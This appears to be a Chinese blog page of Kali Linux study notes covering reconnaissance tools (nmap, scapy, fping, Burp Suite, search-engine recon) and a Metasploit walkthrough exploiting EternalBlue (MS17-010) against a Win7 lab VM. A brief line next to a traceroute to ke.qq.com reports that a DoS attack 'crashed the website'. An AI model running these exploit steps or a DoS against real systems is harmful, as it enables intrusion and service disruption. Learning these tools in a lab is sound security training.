Kali(更新中)

桥接相当于虚拟机和物理鸡在同一个网络

快捷键

Ctrl+shift+‘+’        放大字体

Ctrl+‘-’                缩小字体

Ctrl+shift+T        打开新终端

Windows

type 1.txt                查看文件内容(cat)

md 123                   创建文件夹(mkdir)

copy 1.txt 2.txt        复制文件

xcopy 123 1234      复制文件夹

ren 1.txt 2.txt          重命名

rd 123                     删除目录(提示不为空)

rd 123 /S                删除目录

del 1.txt                  删除文件

nslookup                查看域名服务器

ipconfig [/all]           IP

tasklist [/V详细]       当前进程

taskkill [/F强制] /PID 号        杀死进程

net user [name]       用户

ipconfig /displaydns DNS缓存

ipconfig /flushdns     清空缓存

 命令

pstree        进程树

主动信息搜集

二层发现

在以太网中,数据传输的目标地址是MAC地址,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。
计算机使用者通常只道目标机器的P信息,“地址解析”就是主机在发送帧前将目标P地址转换成目标MAC地址的过程。
简单地说,ARP协议主要负责将局域网中的32为P地址转换为对应的48位物理地址,即网卡的MAC地址,保障通信顺利尽行。

主动网络发现

 Netdiscover网络扫描工具_测试开发小记的博客-CSDN博客

 三层发现

ping

traceroute命令可以对路由进行跟踪
traceroute ke.qq.com

dos流量攻击

有效,网站干崩了

fping

fping就是ping命令的加强版他可以对一个IP段进行ping扫描,而ping命令本身是不可以对网
段进行扫描的。

四层发现

Nmap的常用命令和高级用法_nmap命令_内网漫游-网安人的梦的博客-CSDN博客

scapy

定制ARP包

 定制ping包

定制TCP的SYN包

 目标资产信息搜集—被动

主动信息搜集:与目标主机进行直接交互,从而拿到目标信息,缺点是会记录自己的操作信息。比如:nmap端口扫描,scapy高级扫描等。

被动信息搜集:不与目标主机进行直接交互,通过搜索引擎或者社会工程等方式间接的获取目标主机的信息。比如:google搜索,Shodan搜索,fofa搜索,钟馗之眼等。

wireshark

wireshark使用_Int mian[]的博客-CSDN博客

Nmap

Nmap使用教程图文教程(超详细)_士别三日wyx的博客-CSDN博客

man namp

man+XXX 查看XXX操作手册

nmap -v 192.168.0.250  // 扫描我的物理机

zenmap

打不开解决

Kali Linux安装zenmap报错解决_libffi7_永远是少年啊的博客-CSDN博客

关于kali Linux工具打开提示SyntaxError: invalid syntax_Parle的博客-CSDN博客

使用 

端口扫描:zenmap工具的使用_墨唧的博客-CSDN博客

现在基本不行了​​​

 BurpSuite抓手机包

导出证书文件,想办法整到手机上安装

手机wifi设置代理 

 抓到了

msf攻击永恒之蓝

  永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了

😉打开msf 

┌──(root㉿MyKali)-[~]
└─# msfconsole
                                                  
 ______________________________________
/ it looks like you're trying to run a \
\ module                               /
 --------------------------------------
 \
  \
     __
    /  \
    |  |
    @  @
    |  |
    || |/
    || ||
    |\_/|
    \___/


       =[ metasploit v6.3.31-dev                          ]
+ -- --=[ 2346 exploits - 1220 auxiliary - 413 post       ]
+ -- --=[ 1387 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Start commands with a space to avoid saving 
them to history
Metasploit Documentation: https://docs.metasploit.com/

msf6 > 

😉看永恒之蓝相关模块search ms17_010

MS17-010(永恒之蓝)漏洞分析与复现

Interact with a module by name or index. For example info 3, use 3

or use auxiliary/scanner/smb/smb_ms17_010

😉use 3使用探测漏洞的模块,options查看参数

set RHOSTS win7ip

run

😉use 0使用0号爆破的模块,options查看参数

😉去msdn下一个win7靶机,设置在同一个局域网

😉set RHOST (win7的ip

😉​​​​​​run​

😉

信息收集

子域名收集

谷歌语法:

详解GOOGLE HACK语法 - 知乎

https://www.cnblogs.com/wwcdg/p/15913895.html

site:xx.com

fofa:

FOFA Search Engine

证书查询

crt.sh | Certificate Search

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值